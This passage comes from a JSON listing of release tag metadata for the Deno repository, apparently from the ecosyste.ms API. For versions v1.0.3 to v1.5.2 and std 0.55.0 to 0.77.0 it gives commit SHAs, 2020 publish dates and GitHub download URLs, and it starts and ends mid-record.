},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"